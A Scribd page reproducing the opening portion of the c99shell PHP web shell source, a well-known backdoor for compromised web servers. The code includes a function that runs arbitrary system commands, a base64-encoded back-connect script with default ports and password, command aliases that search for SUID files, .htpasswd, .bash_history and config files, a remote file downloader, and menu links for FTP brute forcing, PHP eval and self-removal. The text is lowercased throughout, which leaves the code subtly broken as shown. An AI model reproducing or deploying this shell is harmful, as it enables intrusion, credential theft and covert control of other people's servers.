Scribd
Upload
435 views7 pages

C 99

The document is a PHP script that appears to be a web shell, providing various functionalities for file management and system commands. It includes configurations for authentication, command aliases, and file types, as well as options for logging and updates. The script contains extensive code for handling requests, executing commands, and managing user sessions.

Uploaded by

anon-377669
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
435 views7 pages

C 99

The document is a PHP script that appears to be a web shell, providing various functionalities for file management and system commands. It includes configurations for authentication, command aliases, and file types, as well as options for logging and updates. The script contains extensive code for handling requests, executing commands, and managing user sessions.

Uploaded by

anon-377669
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 7

<?

php
//starting calls
ini_set("max_execution_time",0);
if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec)
= explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
error_reporting(5);
$adires="";
@ignore_user_abort(true);
@set_magic_quotes_runtime(0);
$win = strtolower(substr(php_os,0,3)) == "win";
define("starttime",getmicrotime());
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function
strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if
(strtoupper($k) != "globals") {strips($arr["$k"]);}}} else {$arr =
stripslashes($arr);}}} strips($globals);}
$_request = array_merge($_cookie,$_get,$_post);
foreach($_request as $k=>$v) {if (!isset($$k)) {$$k = $v;}}

$shver = "1.0 pre-release build #16"; //current version


//configuration and settings
if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
else {$surl = $_request["c99sh_surl"]; //set this cookie for manual surl
}

$surl_autofill_include = true; //if true then search variables with descriptors


(urls) and save it in surl.

if ($surl_autofill_include and !$_request["c99sh_surl"]) {$include = "&"; foreach


(explode("&",getenv("query_string")) as $v) {$v = explode("=",$v); $name =
urldecode($v[0]); $value = urldecode($v[1]); foreach
(array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if
(strpos($value,$needle) === 0) {$includestr .=
urlencode($name)."=".urlencode($value)."&";}}} if
($_request["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
if (empty($surl))
{
$surl = "?".$includestr; //self url
}
$surl = htmlspecialchars($surl);

$timelimit = 0; //time limit of execution this script over server quote (seconds),
0 = unlimited.

//authentication
$login = ""; //login
//don't forgot about password!!!
$pass = ""; //password
$md5_pass = ""; //md5-cryped pass. if null, md5($pass)

$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = ip or host


e.g. array("192.168.0.*","127.0.0.1")
$login_txt = "restricted area"; //http-auth message.
$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell
v.".$shver."</a>: access denied";

$gzipencode = true; //encode with gzip?


$updatenow = false; //if true, update now (this variable will be false)

$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //update server


$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //sources-server

$filestealth = true; //if true, don't change modify- and access-time

$donated_html = "<center><b>c </b></center>";


/* if you publish free shell and you wish
add link to your site or any other information,
put here your html. */
$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array,
display $donated_html.

$curdir = "./"; //start folder


//$curdir = getenv("document_root");
$tmpdir = ""; //folder for tempory files. if empty, auto-fill (/tmp or
%windir/temp)
$tmpdir_log = "./"; //directory logs of long processes (e.g. brute, scan...)

$log_email = "user@host.tld"; //default e-mail for sending logs

$sort_default = "0a"; //default sorting, 0 - number of colomn, "a"scending or


"d"escending
$sort_save = true; //if true then save sorting-position using cookies.

// registered file-types.
// array(
// "{action1}"=>array("ext1","ext2","ext3",...),
// "{action2}"=>array("ext4","ext5","ext6",...),
// ...
// )
$ftypes = array(
"html"=>array("html","htm","shtml"),
"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess
"),
"exe"=>array("sh","install","bat","cmd"),
"ini"=>array("ini","inf"),
"code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","p
l"),
"img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi"
,"mpg","mpeg"),
"sdb"=>array("sdb"),
"phpsess"=>array("sess"),
"download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
);

// registered executable file-types.


// array(
// string "command{i}"=>array("ext1","ext2","ext3",...),
// ...
// )
// {command}: %f% = filename
$dizin = str_replace("\\",directory_separator,$dizin);
if (empty($dizin)) {$dizin = realpath(".");} elseif(realpath($dizin)) {$dizin =
realpath($dizin);}
$dizin = str_replace("\\",directory_separator,$dizin);
if (substr($dizin,-1) != directory_separator) {$dizin .= directory_separator;}
$dizin = str_replace("\\\\","\\",$dizin);
$dizinispd = htmlspecialchars($dizin);
/*dizin*/
$real = realpath($dizinispd);
$path = basename ($php_self);
function dosyayicek($link,$file)
{
$fp = @fopen($link,"r");
while(!feof($fp))
{
$cont.= fread($fp,1024);
}
fclose($fp);

$fp2 = @fopen($file,"w");
fwrite($fp2,$cont);
fclose($fp2);
}

$exeftypes = array(
getenv("phprc")." -q %f%" => array("php","php3","php4"),
"perl %f%" => array("pl","cgi")
);

/* highlighted files.
array(
i=>array({regexp},{type},{opentag},{closetag},{break})
...
)
string {regexp} - regular exp.
int {type}:
0 - files and folders (as default),
1 - files only, 2 - folders only
string {opentag} - open html-tag, e.g. "<b>" (default)
string {closetag} - close html-tag, e.g. "</b>" (default)
bool {break} - if true and found match then break
*/
$regxp_highlight = array(
array(basename($_server["php_self"]),1,"<font color=\"yellow\">","</font>"), //
example
array("config.php",1) // example
);

$safemode_diskettes = array("a"); // this variable for disabling diskett-errors.


// array (i=>{letter} ...); string {letter} - letter of a drive
//$safemode_diskettes = range("a","z");
$hexdump_lines = 8;// lines in hex preview file
$hexdump_rows = 24;// 16, 24 or 32 bytes in one line

$nixpwdperpage = 100; // get first n lines from /etc/passwd

$bindport_pass = "c99"; // default password for binding


$bindport_port = "31373"; // default port for binding
$bc_port = "31373"; // default port for back-connect
$datapipe_localport = "8081"; // default port for datapipe
$back_connect="iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjgntzd0gimx5bngiow0kjhn5c3r
lbt0gj2vjag8gimb1bmftzsatywaio2vj
ag8gimbpzgaioy9iaw4vc2gnow0kjda9jgntzdsncir0yxjnzxq9jefsr1zbmf07dqokcg9ydd0kqvjhvl
sxxtsncirpywrkcj1pbmv0x2f0b24ojhr
hcmdldckgfhwgzgllkcjfcnjvcjogjcfcbiipow0kjhbhzgrypxnvy2thzgryx2lukcrwb3j0lcakawfkz
hipihx8igrpzsgirxjyb3i6icqhxg4ikt
sncirwcm90bz1nzxrwcm90b2j5bmftzsgndgnwjyk7dqpzb2nrzxqou09ds0vulcbqrl9jtkvulcbtt0nl
x1nuukvbtswgjhbyb3rvksb8fcbkawuoi
kvycm9yoiakivxuiik7dqpjb25uzwn0kfnpq0tfvcwgjhbhzgryksb8fcbkawuoikvycm9yoiakivxuiik
7dqpvcgvukfnurelolcaipiztt0nlrvqi
ktsncm9wzw4ou1ret1vulcaipiztt0nlrvqiktsncm9wzw4ou1rervjslcaipiztt0nlrvqiktsncnn5c3
rlbsgkc3lzdgvtktsncmnsb3nlkfnurel
oktsncmnsb3nlkfnure9vvck7dqpjbg9zzshtverfulipow==";

// command-aliases
if (!$win)
{
$cmdaliases = array(
array("-----------------------------------------------------------", "ls -la"),
array("find all suid files", "find / -type f -perm -04000 -ls"),
array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
array("find all sgid files", "find / -type f -perm -02000 -ls"),
array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
array("find config.inc.php files", "find / -type f -name config.inc.php"),
array("find config* files", "find / -type f -name \"config*\""),
array("find config* files in current dir", "find . -type f -name \"config*\""),
array("find all writable folders and files", "find / -perm -2 -ls"),
array("find all writable folders and files in current dir", "find . -perm -2
-ls"),
array("find all service.pwd files", "find / -type f -name service.pwd"),
array("find service.pwd files in current dir", "find . -type f -name
service.pwd"),
array("find all .htpasswd files", "find / -type f -name .htpasswd"),
array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
array("find all .bash_history files", "find / -type f -name .bash_history"),
array("find .bash_history files in current dir", "find . -type f -name
.bash_history"),
array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
array("find .fetchmailrc files in current dir", "find . -type f -name
.fetchmailrc"),
array("list file attributes on a linux second extended file system", "lsattr
-va"),
array("show opened ports", "netstat -an | grep -i listen")
);
}
else
{
$cmdaliases = array(
array("-----------------------------------------------------------", "dir"),
array("show opened ports", "netstat -an")
);
}

$sess_cookie = "c99shvars"; // cookie-variable name

$usefsbuff = true; //buffer-function


$copy_unset = false; //remove copied files from buffer after pasting
//quick launch
$quicklaunch = array(
array("<img src=\"".$surl."act=img&img=home\" alt=\"home\" height=\"20\"
width=\"20\" border=\"0\">",$surl),
array("<img src=\"".$surl."act=img&img=back\" alt=\"back\" height=\"20\"
width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
array("<img src=\"".$surl."act=img&img=forward\" alt=\"forward\" height=\"20\"
width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
array("<img src=\"".$surl."act=img&img=up\" alt=\"updir\" height=\"20\"
width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
array("<img src=\"".$surl."act=img&img=refresh\" alt=\"refresh\" height=\"20\"
width=\"17\" border=\"0\">",""),
array("<img src=\"".$surl."act=img&img=search\" alt=\"search\" height=\"20\"
width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
array("<img src=\"".$surl."act=img&img=buffer\" alt=\"buffer\" height=\"20\"
width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
array("<b>encoder</b>",$surl."act=encoder&d=%d"),
array("<b>tools</b>",$surl."act=tools&d=%d"),
array("<b>proc.</b>",$surl."act=processes&d=%d"),
array("<b>ftp brute</b>",$surl."act=ftpquickbrute&d=%d"),
array("<b>sec.</b>",$surl."act=security&d=%d"),
array("<b>sql</b>",$surl."act=sql&d=%d"),
array("<b>php-code</b>",$surl."act=eval&d=%d"),
array("<b>update</b>",$surl."act=update&d=%d"),
array("<b>feedback</b>",$surl."act=feedback&d=%d"),
array("<b>self remove</b>",$surl."act=selfremove"),
array("<b>logout</b>","#\" onclick=\"if (confirm('are you sure?'))
window.close()")
);

//highlight-code colors
$highlight_background = "#c0c0c0";
$highlight_bg = "#ffffff";
$highlight_comment = "#6a6a6a";
$highlight_default = "#0000bb";
$highlight_html = "#1300ff";
$highlight_keyword = "#007700";
$highlight_string = "#000000";

@$f = $_request["f"];
@extract($_request["c99shcook"]);

//end configuration

// \/next code isn't for editing\/


function ex($cfe)
{
$res = '';
if (!empty($cfe))
{
if(function_exists('exec'))
{
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($cfe);
}
elseif(function_exists('system'))
{
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
function which($pr)
{
$path = ex("which $pr");
if(!empty($path)) { return $path; } else { return $pr; }
}

function cf($fname,$text)
{
$w_file=@fopen($fname,"w") or err(0);
if($w_file)
{
@fputs($w_file,@base64_decode($text));
@fclose($w_file);
}
}
function err($n,$txt='')
{
echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font
color=red face=verdana size=-2><div align=center><b>';
echo $globals['lang'][$globals['language'].'_err'.$n];
if(!empty($txt)) { echo " $txt"; }
echo '</b></div></font></td></tr></table>';
return null;
}
@set_time_limit(0);
$tmp = array();
foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
$s = "!^(".implode("|",$tmp).")$!i";
if (!preg_match($s,getenv("remote_addr")) and !
preg_match($s,gethostbyaddr(getenv("remote_addr")))) {exit("<a
href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: access denied - your
host (".getenv("remote_addr").") not allow");}
if (!empty($login))
{
if (empty($md5_pass)) {$md5_pass = md5($pass);}
if (($_server["php_auth_user"] != $login) or (md5($_server["php_auth_pw"]) !=
$md5_pass))
{
if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>","
",$donated_html));}
header("www-authenticate: basic realm=\"c99shell ".$shver.": ".$login_txt."\"");

You might also like